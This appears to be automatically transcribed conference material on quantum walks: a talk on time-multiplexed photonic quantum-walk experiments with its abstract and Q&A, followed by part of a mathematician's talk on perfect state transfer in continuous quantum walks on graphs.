at coin operations versus spatial operations, and what you find is that we had a coin operation which is rather non-trivial, which means that you can also simulate something like a controlled gate in the coins, and so on, and in this experiment we showed that we create inseparability. And then, by having dynamic control, you could even have something like a Bose–Hubbard-type nonlinearity and bound states. So basically you can play with that system too, and we can study these coherence phenomena. So what I showed you were results from time multiplexing — coherence and decoherence in these sorts of 2D quantum walks — and in the meantime we did a lot of different things, but I can't present all of them: we looked at decoherence and losses, we looked at percolation graphs, Markov processes, graph engineering, state transfer, and we also measured topological invariants. So there are different things on which you can work and for which you can use these quantum walks.
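The identification used here between two walkers on a line and one walker on a 2D lattice can be written, in my own notation, as a regrouping of the tensor factors:

$$\big(\mathcal{H}_{x_1}\otimes\mathcal{H}_{c_1}\big)\otimes\big(\mathcal{H}_{x_2}\otimes\mathcal{H}_{c_2}\big)\;\cong\;\underbrace{\big(\mathcal{H}_{x_1}\otimes\mathcal{H}_{x_2}\big)}_{\text{2D position}}\;\otimes\;\underbrace{\big(\mathcal{H}_{c_1}\otimes\mathcal{H}_{c_2}\big)}_{\text{4-dimensional coin}}.$$

A product coin $C_1\otimes C_2$ then corresponds to two non-interacting walkers, whereas a genuinely four-dimensional, non-product coin plays the role of an interaction between them — which is, as far as I read the talk, what the non-trivial coins and the inseparability and bound-state statements above refer to.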
Now, so this was kind of the review I promised you — this is what you can basically do with these systems, and we are always happy if you have ideas, like "can you do the experiments to see and to model that", and we see whether we can do these things. And I should acknowledge there also, I think they really did a great job with us, because they said, oh, this is what we would really like to do there, can you implement that — it's not trivial, but you can do a lot of things there. Now, in the last year we were looking at our system, and at some point, if you have been working for 10 years with the same system, you think, okay, can we modify it a little bit, can we do something new? It's a Mach–Zehnder-type interferometer, and if you go to optics, Mach–Zehnders are actually not the interferometer you have to use all the time. There are two very prominent interferometers I brought to you: one is the Michelson interferometer from the Michelson–Morley experiment — I guess a lot of you had to do that in your tutorials, because that's one of the things you do — and if you look at LIGO, for example, they also use that geometry. So from an experimental point of view it's a quite natural question to ask: why do we always use this Mach–Zehnder geometry? Does it make sense to use a looped Michelson interferometer? Does it make any difference? Does it have any advantages? What can you gain from that? So let's have a look at the Michelson interferometer, step one again. Okay, we still start with a pulse and a coin state, which is the polarization, and now our interferometer consists of a polarizing beam splitter and then two arms with two different lengths. So we start again: a coin operation changes the internal state, and — I'm sorry for the animations, I realized I had a different format and it broke all of them, I just couldn't repair that in the timeframe, but anyhow — depending on the internal state you go either up or to the right, and you see this polarization splitting. Bring them back; they come back to the coin space, and you see that because of the different arm lengths they will arrive at different times, and then we have here two different coins again. And what's happening now is that, depending on whether you're going back in this direction or that direction, you have a pulse which can propagate this way or that way, which is counter-propagating or co-propagating. What does that mean? So, up to now we had coin and step operations, but this different path — whether you go clockwise or counter-clockwise — allows us now to implement a four-dimensional coin, because we now have the polarization, the different delays, and the direction in which you're traveling. And the way you can understand that in a visual representation is the following. We have here the positions, so we still have just a quantum walk on a line, but now we have different paths along which we can travel through it: you can either go along the upper part to the left and to the right, which would correspond, for example, to clockwise, or along the lower part, which is counter-clockwise. So you can go back and forth in different ways; we have a 1D quantum walk with a four-dimensional coin.
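In formulas — my own schematic labelling, not necessarily the notation of the corresponding paper — the coin space of this looped Michelson walk can be thought of as polarization tensored with propagation direction,

$$\mathcal{H}_{\mathrm{coin}}\;\cong\;\mathbb{C}^2_{\mathrm{pol}}\otimes\mathbb{C}^2_{\mathrm{dir}}\;=\;\operatorname{span}\big\{\,|H,\circlearrowright\rangle,\;|V,\circlearrowright\rangle,\;|H,\circlearrowleft\rangle,\;|V,\circlearrowleft\rangle\,\big\},$$

so a block-diagonal $4\times 4$ coin (no coupling between $\circlearrowright$ and $\circlearrowleft$) gives two independent walks on the line, while off-diagonal blocks couple the clockwise and counter-clockwise walks — the two regimes shown in the experiments described next.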
So this is how that works this is a step operation we have different coins on the one hand we have a coin in the arms which kind of corresponds ever the precision you define if you in which direction you go and we have a coin in the loop so inside the loops and this defines which coin you have a coupling with different quantum blocks and you find this is a nice new tool where you can play with the system. So this is the full setup to start with so here's the input coupling here's again electro optic modulators everywhere in order to completely control them we have 14 for internal degrees of freedom and we label them by clockwise horizontal clockwise vertical counter and so on these electro optic modulators for dynamic control we use supercontacting single photon detectors to get good efficiencies around to efficiencies around 75 percent and this is a the fiber length which defines how the persistence step are actually done. So what can you do with that? The point is that this coin this four dimensional coin is completely controllable and here you see that we can either separate them it depends on how these settings are such that you just have standard quantum walks on lines and thus you expect in counter clockwise and clockwise position just standard quantum walk evolutions if you kind of cut here these coins you have independent evolutions you don't see any special thing and this is what we tested and it works quite nicely it's getting interested as soon as you look at different settings and for example and you start to have coupled quantum walks so basically you start in these different line that you have coupled couplings between clockwise and counter clockwise and you really have this four dimensional walk dynamics and here you see that experiments and what we did is we implemented one of these coupled quantum walks and looked at the theory which simulations here say what do we expect experiments and you see again the similarity is really nicely so this is kind of these two experiments were to see okay is the setup doing what we expect and it's working quite nicely and then we thought okay what can we what else can we do and then one of the challenges and experiments with a few decisions always came in like oh can you implement periodic boundary conditions and I should be honest in our quantum walks it was like periodic boundary conditions is tricky but here you see it already we had coupled and uncoupled how you can do it quite nicely so you implement a system where you cut the links here everywhere and at the edges you keep them connected and then you of course you have to go back to the theory and see if that works but it does so basically what that means we have a very elegant way to implement periodic boundary conditions because is that this thing is nothing else like a circle and this is intrigued us we coupled our light at a position four and we implemented first an identity coin such that we are not expected to be in the furences but we had a diagonal input in the coin space and we expected this triangle to travel basically we just have two pulses which travel along the lines and this is experiment it's related to see that this works quite nicely the next step we coupled we had a coin which was Hadamard coin we see very nicely also then and you expected some points that you have these quality positions of this works so basically what the new tool we bring in there now we are also able to implement in a rather easy way these periodic boundary condition and we can make circles of 
different sizes so this was for example of 12 different sides again identity sorry this is you I see it better than here but it looks quite nice and also Hadamard coin so periodic boundary condition this is the message I want to convey here yes nowadays we also know how we implement in these quantum works periodic boundary conditions and we have these quantum work with a four dimensional coin and the questions what else can you do and now comes the question what really what's interesting and this is what we are looking for one thing we tried simply because of experiment curiosity can we have coupled circles this is that way you do it again you cut a different position you have a coupling for identity coin we expect that and if you have Hadamard coin you see again these couplings that all works quite nicely and then we submitted and then people are like yeah but what is really kind of the significance of what is it but we really want to see with that coupled systems why is a four dimensional coin different than a two dimensional coin and this is when we started look at the band structure of a 4D coin so if you look at band structures you can have so stick drivel band structures where we only have group velocity two maximum of the group velocities and this is why why these quantum works you see always these spreading in two paths well as soon as we have a four dimensional coin can have band structure with a non-trivial and you have different maximum group velocities and you expect here four different maximum so you should get at this positions quantum works which evolves there and you do see that the theory in simulation that you get kind of power along these lines but you see already here where our system comes to well at its boundaries we need more steps that we see it but already here to have 20 steps is good I think it's experimentally very good but we really would like to have more steps but I think we are quite excited about that and I think there's much more we can do with that we have ideas but if you think okay four dimensional coin is really interesting this is something which we also can do in the lab nowadays so I think I have something like 10 minutes still right the flat yeah this is the experiment sorry this was only the marathon experiment it is it looks exactly like we expect you don't see this branch too much because it's just if you let it run for longer so what about applications and as I promised already it's not an application where say now I put the quantum computer but we really wanted to ask okay what is it what would we like to see and we have an interest in fundamental science and I would I really am intrigued what can we simulate with these things and what makes the system quantum what does make the system quantum well let's go back to the standard quantum mechanics apostolate this is one way to formulate that these are four of them well the system can describe can be described by state vectors and vector space clear the evolution is a unitary evolution so all dynamics is described by that okay fine and to be honest this is I think one way to describe what we do in our time multiplex quantum works where we did all these beautiful experiments we exploited these two things now what's left is measurement in composite systems and if you had asked me for I would say okay they are more quantum in the sense for sure you can't do these things with coherent light not really that we first take on the first one measurement so what about measurements so these dynamics and we 
know a measurement is rather different than the evolution a unitary evolution and we wanted to test the quantum walk dynamics which is impacted by a measurement so we wanted to look at measurement induced dynamics and then you have to find systems where this makes a difference and one now you go to your beauty colleagues and ask him okay where do measurements make a difference how can we work on that and then they told us well look at recurrence phenomena recurrence phenomena is you start a walk at some point and you ask when is a worker coming back and we can look at two different scenarios the one I would like to call the measurement free regime and the other one the measurement induced regime let me explain what I mean so if I ask does a worker come back if I study position zero two positions zero after sometime or has it come back I have done see how do I verify if I have many steps number that it did come back well I have two ways I take measurements for all for the state evolution zero two and then I just look at the probabilities that the worker did come back at the position zero in step two and I do all these different measurements I put them together and then I calculate the recurrence probability okay and this is measurement free I look in the assortments I'm at with all these different steps I put them together and then I have the phenomena and this is one way to answer that a different thing is when I say okay I always look at that position at zero and I let the evolution involve again I look at the position and let it walls and I only take statistics at the end and ask did it come back these are the formulas how you calculate it turns out that here of course you disturb the quantum work dynamics all the time because we always to take a measurement at position zero as a measurement induced here I don't disturb the dynamics because I look just look into that what's interesting is that if you go for many steps that the limit is different the first came the probability tends to one in the second regime it tends to two over pi and I we thought that's good because this is something we can test experimentally now the question is can you do that how do you do that the interesting thing is you can do that to introduce things what that means is we disrupt our evolution such that we always look only on that one position and now a case you will see how we do that and do the measurement and the rest we let it walls as it was this is set up how you can do that this again the one D loop geometry path is going these are these different fiber lengths where we have these electro optic modulated and modifying the coin space and now we have here the coin what we added in addition there is these electro optic modulator because this is one process so this is for example horizontal working and then it looks back and there's vertical looks back if you switch at that position the procession only for one thing now we switch it from horizontal to vertical and the porous imping strength that are let it transmit couples it out only where we had it in here we do the opposite typically it would reflect back but we have coupled it out and this you can do position resolved you always couple all right out at specific positions we call that sink we can measure that and we can make the evolution work and this way well this is we could test that so we first did the quantum walks with different steps size and looked at the positions and then we did it with that measurement and you see clearly all the difference 
and then if you are able to do it over that sufficient steps so you see the increasing slowly in the number of steps size of 35 steps you could really have these different regimes and have two to three minutes left we like that a lot because I think it shows you nicely how you control these coherences and what we introduced we introduced a loss basically which operate on the whole pause and we published that then if you just came to us and say well if you can do we can also test the relation between non-classicality and coherent theory you have to do this experiment which is very similar also with things we're on the one hand we want to see if you just let the evolution go over n steps and see what the evolution does and get the probability distribution of these things and then the other one we want to test more classical theory by that you gain interrupt the evolution but now we block instead of only one position only we only let one pass and we can block different sides as you see so we block all this and then check for these different evolutions and this situation we can measure conditional probabilities where we had this interruption here we didn't have that interruption and this corresponds to a combined probability distribution and this is just a probability distribution of the whole work now from a classical perspective if I have the conditional probabilities and put them together that doesn't make a difference if I have all the conditional probabilities and everything which makes a difference between that is because of quantum coherence in the system so this is basically the quantum coherence test and this is for classical combined conditional distributions now these two evolutions if you put them together there is a difference and the difference between these statistics is generated by the coherence and converted into a population I think that's quite nice because now we have a quantitative measure or way to see how the coherence of quantum work which we know how this is related to a non-classicality in correspondence to conditional probability distribution and then you measure on the one hand the Kolmogorov non-classicality that basically means we could how we could explain with classical thing and ask if you have this conditional probabilities what you expect on the other hand we look at the coherence generated and detected in these undisturbed coherent evolutions and what you find is that they correspond one to one so this is the experimental data the offset we know where it comes from it's actually an experimental imperfection how well you can couple out on the whole line so you see the experiment but I think that's really nice and I told you I'm interested what is the difference what is the classical and quantum work and this is I think a nice way to see how you can test these systems in the experiment my time is almost over I guess so let me sum up what did I show you in this presentation well I started with an introduction and this introduction was basically well to show you what we do and show you what I believe why we start we set up our time at the next quantum works and what their big strength is they are reconfigurable they're stable and to some extent scalable and I should say for us this is still a big challenge we're working on that in different ways and we know we have to scale up systems but this is not trivial I showed us our quantum box setups here's the 1d loop geometry we can do 2d loop geometries and the newest geometry the Mike's type geometry but we can 
implement quite nicely on a one-dimensional quantum box a four-dimensional coin and this brings for example the power that we can have boundary conditions and then I looked at applications where we studied already what makes the difference between classical and quantum's we looked at the recurrence for a phenomenal measurement to use phenomena and non-classically worth coherence before really coming to the final end I really would like to acknowledge the work by the collaborators we did all these quantum work experiments wouldn't have happened if it was not EX together our God please great come to the battle of potashik Martin Stefanak who 10 years ago came to us or maybe it's 15 years say we have that idea can't we do this quantum work experiments and I think we did great work and we developed all kinds of different experiments I also wanted to acknowledge in the latest work which is done by Martin clean Martin clean is in our hookahs group and we really rely heavily the future tell us what would be interesting where should we go and I think it's a nice way of collaborating in that sense and the next question is where should we go with that what is the outlook I restored some of the things and of course as experimentalists we also have ideas and I like this picture lot I think there's a classical word where we're playing with particles at least this is one way as soon as you go to super positions we go wild or very partly dualism but if you're talking about photons this is kind of classical optics but there is this boundary and I think there's yet another boundary which we have to cross to look at well what quantum optics people like to talk genuine quantum effects what that means is we would like to understand better how does the multi-particle dynamics both on dynamics impact that thing and I told you at the beginning we have a low qc and we know as soon as we put conditioning measurements but we also need the fundamental effect so effects which come from multi-particle effects how is the interplay in one to quantum system become complex computational complex and you know I've not been talking about bosom sampling but this is definitely highly related to that question you have first results on that too in this afternoon so some day they will talk about that now I'm inviting you to this talk and finally I also have to acknowledge the work of my group it's not only me it's really the whole team in particular Sonia Park of me and spelling Trump Thomas Nietzsche and then at Lord's and others but they kind of make this work happen because otherwise I wouldn't be standing here so thank you very much for your attention in that case that the expected return time should be an integer have you thought of doing an experiment maybe you have done it already that would test some something like that no but I'd love to talk about that okay I think we had already but it's long time ago okay thank you so you seem to have been implementing the moving shift the shift operator that if you apply over and over the particle go to the same direction can you implement the flip flop shift operator so if apply twice the particle go back to the same position with the four-dimensional coin we can let me try to I think we can because let me try to find that I would have to think about that but I guess I think one way we haven't done it but one way you might want to do is go there and there back it's an afforded mental coin so if you have it so what do you want to do apply twice and then you back at the same position 
it must be the shift not the coin so if you apply the shift twice the particle must go back to the same position I'm not sure but you might have a chance with a four d coin by simulating with a four d coin just a one d system I'm not sure I have another question okay so there is those results about quantum supremacy and Google is claiming that we now have quantum supremacy so my question is why the quantum community couldn't go ahead and implement something that couldn't be simulated by a classical computer okay my answer is twofold first of all talking about quantum supremacy and photonics I'm not aware that somebody has succeeded there I'm looking in the audience but I'm pretty sure that we don't have 50 photons in a linear network yet so this is well there are different difficulties this is why I have a whole group doing integrated optics I wouldn't say that there's no chance but we probably need better systems because the probabilities of the way we are generating single photons is by heralding so we have a two photon pros and herald one I calculate that if you want to do that 50 times what the probability that this happens will be so this is just a just experimental challenge there's quantum dots but the photons community definitely wants to go there now and I can only answer you from a photon's perspective maybe there's other ways but I think the other thing is more interesting why do the theory not exist and this is really what I find intriguing we know that the boson sampling network if you want you can implement well we can write down a quantum it's a quantum work come on it's just linear couplings and if you then I'm pretty sure that you can convert that to a quantum work with some randomized coin pattern but it's a very specific circuit there I think quantum works an ideal tool to understand what structure is needed yet to go from classical systems to something which is in the range of the quantum supremacism and actually we are talking with computer scientists about that and I think the answer is simply it's a hard topic so we as experimentalists we find really hard and I think if this community goes in the direction to ask what kind of quantum walks with many walks would lead to a system which is similar can be simulated which can't be simulated there's a highly interesting question but you're writing the asking the wrong person I'm out there I'm experimentalist I'm doing things I give the question back to the to the audience if I may add there is a quantum circuit called IQP and by Michael Brenner and Richard Jouza so they approved assuming this polynomial hierarchy is called and they proved if the quantum circuit start with hard mode and then diagonal and another hard mode is hard oh that's interesting to simulate classically so they said I can send you yeah and then we follow that up because relating to quantum work if you and try to do quantum work on circular graph circular graph as I said yesterday can be diagonalized by Fourier so what we have is Fourier start diagonal and Fourier we claim Fourier is harder than hard mode on that basis quantum work on circular graph should be hard classically okay okay thank you this is that I knew that it's not okay yeah I just what may I ask a question so you did a 1d and 2d like this how difficult it is to implement quantum work on arbitrary kind of more complex more interesting graph circular graph um I think the question is a little bit more intrigue it depends when you give me a graph I can try to implement that and then there are 
some things which are easy and something which is hard for example I want to go to 4d in positional space the system to have more more loops is trivial but then how what about the coin you get a lot of decoupled coins and then it's probably not useful because it's just a lot of one d quantum walks we stick together this is why I showed the 2d quantum walk there we had it not only a two-dimensional grid but the coin was not trivial you understand so it's not only the graphs but you also have to ask can you implement the graph in the complete set of coins or at least a lot of coins which are meaningful this is also why we like with four-dimensional coin a bit and how hard it is in general I think you can't say you have to have a specific problem and have to find good ideas how to implement that that answer okay okay yeah so that's actually I have a question that's thank you so much for the beautiful talk and this is you mentioned at the beginning of the part and that's the you listing up the three of that this is needed on the requirement of the good platform and that's the in the you demonstrated that scalability on something and that's the linear optics technique and also that but you have the strong image about this stability but it's there that's the good indicator of the stability issue okay let me try to answer first the stability so the stability I think the best indicator that you have a stable system is that the walk if you don't behave exactly like you expect from an absolute stable system the reason why we have its stability is by clever design yeah basically the pulses which meet again have always traveled the same path lengths and the time difference between them is only milliseconds and this is the design so this is it looks very simple but it's designed such that any fluctuations in phase doesn't hurt this system and there's other things I should say if we try to initialize our walk with multiple walkers in parallel then we run into stability issues so then we have to play tricks and you're thinking about these things too but in the things that I showed the setup itself the circuitry can be stable but there are challenges if you want to look into that what was the second question yeah that's a quantitative we didn't consider that necessarily because but I even wouldn't know how to do that no we didn't because we see that it's highly stable but okay okay we can continue the discussion over the coffee break and but possibly thanks speaker again and
|
Photonic quantum systems, which comprise multiple optical modes, have become an established platform for the experimental implementation of quantum walks. However, the implementation of large systems with many modes — that is, with many step operations, highly dynamic control of many different coin operations, and variable graph structures — typically poses a considerable challenge. Time-multiplexed quantum walks are a versatile tool for the implementation of a highly flexible simulation platform with dynamic control of the different graph structures and propagation properties. Our time-multiplexing technique is based on a loop geometry and ensures an extremely high homogeneity of the quantum walk system, which results in highly reliable walk statistics. By introducing optical modulators we can control the dynamics of the photonic walks as well as the input and output coupling of the states at different stages during the evolution of the walk. Here we present our recent results on time-multiplexed quantum walk experiments.
|
10.5446/54097 (DOI)
|
Thanks. And I'd like to thank the organizers for inviting me here. Now, you're going to have to put up with two problems with this talk. One will be the Australian accent, which I can't do anything about. And another is that I'm a mathematician, not a physicist, and so there will be some culture gaps, but we'll try and deal with that. So, there are a number of areas, a number of problems that arise from quantum computing that have overlap with graph theory. And quantum walks is one of them. And so today I'm talking about some work on continuous quantum walks. So, I'm going to start by going over some background, most of which is sort of completely trivial, but it may at least get you used to the notation I'm using. One thing I should say is that, okay, I'm talking about open problems, questions that I would like to solve or see solved. And to provide motivation, I'm going to talk about some of the work we've been doing, and the work has been, by and large, with this group of people — so, how many of you are here? So, it's joint work, and I'll try and be accurate, but there we go. From my point of view, the stuff that I'm talking about starts with these three papers. These are standard, I don't think anybody's surprised. And so everything's built from those papers. I'm a graph theorist, and so my interest — well, a continuous quantum walk is a walk on a graph, and so what I'm interested in is the relation between the properties of the walk and the properties of the graph. I might hope that if I get some unusual property in the walk, it'll say something interesting about the graph. So I'm going backwards and forwards between the graphs and the physics, if you like. But let's just write down a few things, just to fix notation. So I'm going to have a graph X — that's my notation — and it's got an adjacency matrix, which is a 01-matrix, symmetric, with zeros on the diagonal. The Laplacian will come later on, but I'll generally be using the adjacency matrix. And if we have an initial state given by a density matrix, the state of the system at time t will be given by that expression there. So this is describing a quantum walk: the initial state, and the state at time t. And so that's the framework that we're working in. Usually the initial state — I tend to write it in terms of vectors, but you guys prefer bras and kets, so I've done both, just to prove I'm bilingual. So usually the initial state would be in a simple form, and you're carrying out your measurements at time t in the standard basis. Now, you have other choices, but this is common and covers many of the situations you're dealing with, okay. Now, I don't think anybody here has any doubt about any of this, but this is just my notation. And of course, I've got my Schrodinger's equation going backwards in time, but it doesn't matter. So, for a continuous quantum walk with transition matrix U of t — well, the entries of U of t have got phase factors in there. If you carry out a measurement, then all the information you get is contained in what I call the mixing matrix, which is the Schur product of U of t with its complex conjugate.
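As a small hedged illustration of these definitions (my own code, just mirroring the formulas; the talk's own sign convention is U(t) = exp(itA), but the mixing matrix is the same for either sign):

```python
import numpy as np

def transition_matrix(A, t):
    """U(t) = exp(-i t A) for a symmetric adjacency matrix A, via its spectral decomposition."""
    w, V = np.linalg.eigh(A)
    return (V * np.exp(-1j * t * w)) @ V.conj().T

def mixing_matrix(A, t):
    """M(t) = U(t) o conj(U(t)), i.e. the entrywise squared absolute values of U(t)."""
    return np.abs(transition_matrix(A, t)) ** 2

A_K2 = np.array([[0.0, 1.0], [1.0, 0.0]])        # complete graph on two vertices
for t in (np.pi / 4, np.pi / 2, np.pi):
    print(f"t = {t:.4f}")
    print(mixing_matrix(A_K2, t).round(6), "\n")
```

Running this prints the all-one-half matrix at t = pi/4, the off-diagonal permutation at t = pi/2 and the identity at t = pi — exactly the uniform mixing, perfect state transfer and periodicity cases of the K2 example worked out next.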
In other words, to get M of t from U of t, I just take the square of the absolute value of each entry of U. So this is a well-defined matrix. It's got the advantage of being real. The entries are non-negative, because they're squares of absolute values. Each row sums to one, because U is unitary. Each column sums to one. It's symmetric, as U of t is symmetric, because the adjacency matrix is symmetric. And so it's often more convenient to state questions about quantum walks in terms of the mixing matrix rather than U of t itself. Anything you can measure experimentally is contained in the mixing matrix. Everything else is phase factors, which are not physical. Okay, so to give a very simple example, I'm going to take my graph to be the complete graph on two vertices. Then the matrix is very simple. And in this case, you can work out in more than one way what U of t is. And this is a mixture of cosines and sines. That's the matrix U of t. As I said before, it's symmetric. And there's the mixing matrix. And you see a new proof that cos squared plus sine squared is equal to one, because each row sums to one. So that would be the mixing matrix. So that's the easiest possible case, although it's not trivial, as we'll see. Now, I'm interested in properties of the walks, and I can illustrate these properties already on K2. Okay, we look at what happens at various times, and I'm going to consider three cases: pi over 4, pi over 2, and pi. Now, at time pi over 4, the entries of U all have the same absolute value. So the mixing matrix will be one-half, one-half, one-half, one-half. Okay, and that's referred to as uniform mixing. The case that people are most interested in is the second one, pi over 2. Well, M of t would be zero, one, one, zero. This corresponds to perfect state transfer. And the third one is simply: if you go to time pi, then U is minus the identity, and so M of t is just the identity. So you're back to where you started, and this is what's called periodicity. Now, periodicity is not much used in practice, since you don't normally want to get back to your initial state, and there are cheaper ways of doing it than running the walk. But the issue is that if you have perfect state transfer between two vertices at time t, then you're guaranteed to have periodicity on each of those vertices at time 2t. So periodicity comes with perfect state transfer. And when you're trying to decide whether some graph admits perfect state transfer, it's generally easiest to first look for the periodic vertices and then test which ones of those work. So it's a useful tool. And as I said, the main focus — one of the basic questions — is simply: if you've got a graph, is there perfect state transfer between two vertices on this graph? Okay, and that's in some sense what I'll be talking about for the rest of the talk. Now, at the moment we have one example of perfect state transfer, and it was easy, which is good, but it's just K2, the graph on two vertices. And so, if we really want to have a meaningful discussion, we'd like to know that there are more examples. Okay, and so I'm going to provide these examples. Now, there are two ways of looking at this, and for the graph theorists, it depends on this construction. This is a standard product of graphs, and I'll give you a picture in a moment, but the idea is that I'm going to construct a new graph from two input graphs. The vertices in the new graph are the ordered pairs of vertices from the graphs I started with.
So, now I've got these order pairs, so that's the Cartesian product of the vertex set. When are two order pairs going to be adjacent in the new graph? Are they going to be adjacent if they agree on the first coordinate and the second coordinate are adjacent, or if they agree on the second coordinate and the first coordinate are adjacent? Now, you can think about that while I'm sort it out, but the best thing is just to stare at the picture. So, this is the Cartesian product of P4 with itself. So, when you draw the Cartesian product, you have vertical, if two graphs x and y, you have vertical copies of x and horizontal copies of y. So, it's perfectly straightforward. It's a standard product in graph theory. The reason it's relevant, this is something that was noticed by Christandl Lotto in the original paper, if you're looking at the transition matrix for a Cartesian product, it's the tensor product of the transition matrix of the factors. So, you could think of it on the left-hand side, you're thinking of a quantum walk on the Cartesian product. Right-hand side, you've just got two independent quantum walks on the factors. Okay, and so this means that very quickly you can get a bunch of examples. The standard example here is, well, I started with K2. That's the only graph I got, so I'm going to start taking Cartesian products of K2 with itself. I'll call that Cartesian powers. Okay, now the de-Cartesian power of K2 is just the d-dimensional hypercube. I'm going to do this a little exercise, but it's not hard. And because of this relation here between the Cartesian product and the tensor product, you deduce that, well, you can certainly write the transition matrix for the d-cube as a tensor power of the transition matrix for K2. And as a medi-consequence of this, that at times pi and 4, pi and 2 and pi, you get respectively uniform mixing, perfect state transfer, and periodicity on the d-cube. So, on the d-cube, in particular, you get perfect state transfer between pairs of vertices and the d-cube, which is the d-dimensional distance, which would be d in this case. Okay, I'll say one thing. It's not only going to clear why the uniform mixing is occurring. In many of the examples, what happens if you do have perfect state transfer, then at half the perfect state transfer time, you get uniform mixing. Now, we have many examples of that. There are also situations where it doesn't occur, but we don't really know, we don't have any sort of nice natural explanation for it. So, the point would say, uniform mixing, well, who cares? Well, you could say it's a nice way of generating a uniform distribution, but the other issue is that it does seem to go along with perfect state transfer in many cases. So, it's worth keeping in mind. So, the point there is to give you a bit of background and get used to looking at my notation. So, now I want to go on to the questions that I'm interested in. Now, these are a bunch of open questions that have come from our work over the years, and I'm going to start with the perfect state transfer. Now, this is simple enough to state. If you have perfect state transfer at some time and you write things out in objective form, that tells you U of T applied to the Keta is going to be a complex scalar times K to B. Straightforward enough. And in all the examples we have of perfect state transfer, that phase factor is a root of unity, gamma to the n is equal to identity for some n. Now, this makes, if I knew that was true, this would make life easier in a lot of calculations. 
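In symbols, the property just discussed reads as follows (this is simply my restatement of the slide, not new material):

```latex
% Perfect state transfer from vertex a to vertex b at time t:
\[
  U(t)\,\lvert a\rangle \;=\; \gamma\,\lvert b\rangle ,
  \qquad \lvert\gamma\rvert = 1 .
\]
% Open question: must the phase factor be a root of unity, that is,
% does \gamma^{n} = 1 hold for some positive integer n in every
% instance of perfect state transfer?
```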
But I don't know it's true. I can't prove it. So, that's one reason why it's interesting. The other point is that we have a reasonable grasp of when perfect state transfer occurs, but in a certain sense you can say, well, we've got a couple of collections of methods. We've got this Cartesian power trick, and the kind of quotient trick, and so you get a bunch of perfect state transfer by using those two tricks. But in those cases, you're going to get the gammas of root of unity. Now, the question is, are there more interest or more varied ways of getting perfect state transfer? Now, if you do that, it could be a bit hard inside, just as new or not. But what I'm saying is, if you could find a perfect state transfer, and that phase factor is not a root of unity, then it's different from anything we already have. So, it's a fairly simple test. And the third common I should make here is, okay, it was way in roots of unity, so this is bringing in number theory, which I don't make some physicists nervous. At some point, from my point of view, it's interesting because working with quantum walks, the mathematics is a mixture of linear algebra and number theory. And actually, you get some fairly deep number theory at times. And so, this is a baby example. In this case, I'm just asking a question. Now, you can argue that perfect state transfer is unusual or rare, and the first theorem I'm quoting there is evident in favourites. So, it says, if you fix an integer k and you look for connected graphs where no vertex has more than k neighbours, then only finally, many of those graphs admit perfect state transfer. So, you know, this is the same, if I would put it on the ordering, but you can do this as saying that perfect state transfer is not common. Okay? Now, that's fine. I have a suspicion that something stronger is true. So, I'm putting restriction on the maximum valency of the vertex. And so, the idea is, well, can I weaken that? So, one way of weakening would be, instead of saying the maximum valency of the vertex, I could say provided the average valency is not too large. Okay? Now, the reason I want to prove that, so the, well, a canonical example, if you have a tree, the average valency of a vertex is two, and you can't get much more than that. Now, trees are interesting at the point of view of state transfer because they're networks, and they've got the minimum possible number of edges to be connected. So, questions about trees are of some interest. Okay? If you want to have a network, then trees are a good place to start. Now, the question simply is, we don't have any examples of a tree with more than three vertices where perfect state transfer occurs. The graph K2 is a tree, and the path on three vertices is a tree, and they both have perfect state transfer between their end vertices. Okay? Well, we have no tree bigger than that. And I suspect that there aren't any more, but I don't see any way of proving it. So, I've got some more refined questions that might be a bit more accessible, but the, and, well, the situation is a little different when you come to a past here, but I'll come to that later. So, instead of asking for the average degree, I could simply state question terms of the diameter, the maximum distance between two vertices in the graph. So, we've got the path on two vertices, and the PST, that's got diameter one, the path on three vertices, got diameter two, but I'm saying it's possible if the diameter is large enough, you can't get PST. 
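As a quick numerical illustration (mine, not the speaker's), here is a check that the two small trees just mentioned, the paths on two and three vertices, really do admit perfect state transfer between their end vertices. The transfer times pi/2 and pi/sqrt(2) are the standard ones for these two graphs.

```python
import numpy as np
from scipy.linalg import expm

def path_adjacency(n):
    A = np.zeros((n, n))
    for i in range(n - 1):
        A[i, i + 1] = A[i + 1, i] = 1.0
    return A

def end_to_end_probability(n, t):
    """|U(t)_{0, n-1}|^2: transfer probability between the end vertices of P_n."""
    U = expm(1j * t * path_adjacency(n))
    return abs(U[0, n - 1]) ** 2

print("P2 at t = pi/2:       ", end_to_end_probability(2, np.pi / 2))          # ~1
print("P3 at t = pi/sqrt(2): ", end_to_end_probability(3, np.pi / np.sqrt(2)))  # ~1
```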
And it's possible that the diameter version might be easier to prove, so I raise this as a question. Now, the more general question would be this: prove that if you have a positive real number c, there are only finitely many connected graphs with average valency at most c on which perfect state transfer occurs. Now, that's harder than the tree question, so that is the general question, and as I said, we've thought about trees for quite a long while and not made any real progress. So, yeah, so that's that. Now, when you're working with continuous quantum walks, I said I've been using the adjacency matrix, but there are a number of other matrices you could use, and the most common alternative would be the Laplacian. So I've just defined the Laplacian here: I take my graph, I write down the diagonal matrix whose i-th entry is the valency of the i-th vertex, and the Laplacian is then that diagonal matrix minus the adjacency matrix. And then for the transition matrix, you replace the adjacency matrix by the Laplacian. Now, generally speaking, nothing changes qualitatively when you go from the adjacency matrix to the Laplacian. The Laplacian in some senses is more natural, because if you want to think of the quantum walk as an analog of a classical continuous random walk, then the Laplacian is the right matrix. But in practice (and it's not just me) people generally seem to work with the adjacency matrix, and if you do calculations, or you start looking at examples, say you run through the graphs on nine vertices and see what happens, you discover that by and large the data doesn't seem to change that much depending on whether you use the Laplacian or the adjacency matrix. But there is one important difference. Coutinho and Liu proved that for a tree on at least three vertices, the continuous walk with the Laplacian does not admit perfect state transfer. It's a fairly short proof and quite elegant, and so it makes it doubly annoying that we can't decide what happens with the adjacency matrix. And as I said, by and large the proportion of graphs that have PST with the Laplacian is not that much different from the proportion of graphs that have PST with the adjacency matrix, so it's not clear mathematically that there's a huge difference, but there is this result. (Liu was still a student at the time this was done.) So that's perfect state transfer. Now, the natural question for a graph theorist is to ask: suppose I do have perfect state transfer. I've got these two vertices, a and b, and I get my PST from a to b. Now I ask the question, what properties does that mean a and b must share? I mean, if I want to find graphs with PST, the more restrictions I have on the possibilities, the easier it is to identify for which graphs it occurs and for which it doesn't. So, a simple question you can ask: if I have perfect state transfer from vertex a to vertex b, do they have the same valency? This is going to lead to what I call cospectrality, but we'll get to that in a second. This is a little calculation. What it shows is that if you have perfect state transfer from vertex a to vertex b at time t, then at time t you would also get perfect state transfer from vertex b to vertex a. And that means if you run things for twice that time, you get transfer from a to b and back to a, so you have periodicity at 